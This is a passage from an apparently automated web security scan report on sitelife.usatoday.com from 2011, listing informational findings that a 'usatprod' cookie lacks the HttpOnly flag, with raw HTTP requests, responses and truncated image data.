GET /ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "93372a92789cb1:2af"
If-Modified-Since: Sun, 21 Nov 2010 02:56:14 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Last-Modified: Sun, 21 Nov 2010 02:56:14 GMT
Accept-Ranges: bytes
ETag: "93372a92789cb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:16 GMT
Connection: close


11.58. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 6454
Content-Type: image/bmp
Last-Modified: Sun, 27 Feb 2011 04:17:56 GMT
Accept-Ranges: bytes
ETag: "d3da9c4f35d6cb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

BM6.......6...(...(...(..... ...........................................................................................................................................................................
...[SNIP]...

11.59. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 6118
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "ee4b52f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR....... .......<.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..].T.W........@..."DAl@Q...8    .#j61.Dg49g&c.d..3....d..d...1N.D..y.w....c...8.@.FA...AE%.l.Q....._U......N.:U..._.W...{.
...[SNIP]...

11.60. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-background.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 202
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "48ae54f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...lIDATx....    .0..AY..8P.
..].a.3%l.Ww.......D.....J..M    ......r........ 3...... .........2c................O.......l......IEND.B
...[SNIP]...

11.61. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "48ae54f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:16 GMT
Etag: "48ae54f3917acb1:2af"
Connection: close


11.62. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "a21057f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:16 GMT
Etag: "a21057f3917acb1:2af"
Connection: close


11.63. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "48ae54f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:15 GMT
Etag: "48ae54f3917acb1:2af"
Connection: close


11.64. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-blocked.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "39786e5b4b7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 13:46:34 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:14 GMT
Etag: "39786e5b4b7fcb1:2af"
Connection: close


11.65. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-avatar-default.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-default.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 624
Content-Type: image/gif
Last-Modified: Mon, 08 Nov 2010 13:46:35 GMT
Accept-Ranges: bytes
ETag: "5fac45c4b7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

GIF89a(.(...............................................................................................................................................................................................
...[SNIP]...

11.66. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 643
Content-Type: image/jpeg
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "209dc8f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...[SNIP]...

11.67. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 1448
Content-Type: image/jpeg
Last-Modified: Mon, 08 Nov 2010 16:08:58 GMT
Accept-Ranges: bytes
ETag: "9b793f405f7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...[SNIP]...

11.68. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-last-bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-last-bg.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 537
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "b813bff4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close

.PNG
.
...IHDR.............".N'....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....j.@...M...`.Z.5...............(..1.>......^.. .$*..$..D*XDS0RJ........lf....Z.f6...c8a>...x..t..j.j...D".x<.G.....V.
...[SNIP]...

11.69. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-next-bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-next-bg.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 500
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "6cd8c3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close

.PNG
.
...IHDR...E.........g.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....k.P....h..`p.P..:.T!.........k......+8;(...`...W.Ms.t)...........'..0.q.j..n...b.Q..F.....:c.f..N.H....B.BY........P.
...[SNIP]...

11.70. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-primary-button-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-left.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 638
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "1276c1f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<... IDATx....k.A...g....$.)..A...X.....7.XY..cmsDm..!(.Q....5....+b.r....Yg..]1..O...,<.fv.../=..w.u.@.j.kw....E....XEQ$......    Y.
...[SNIP]...

11.71. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-primary-button-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-right.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 440
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "209dc8f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR..............L_.....tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx.tQ.JBA.=3.7$...=(......hQH....h.......6.I.P[w."Zd..LA....z......:.....g....;...A*iq..)W...Z.l#}i..6..sX.....aN...i.ABa.
...[SNIP]...

11.72. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

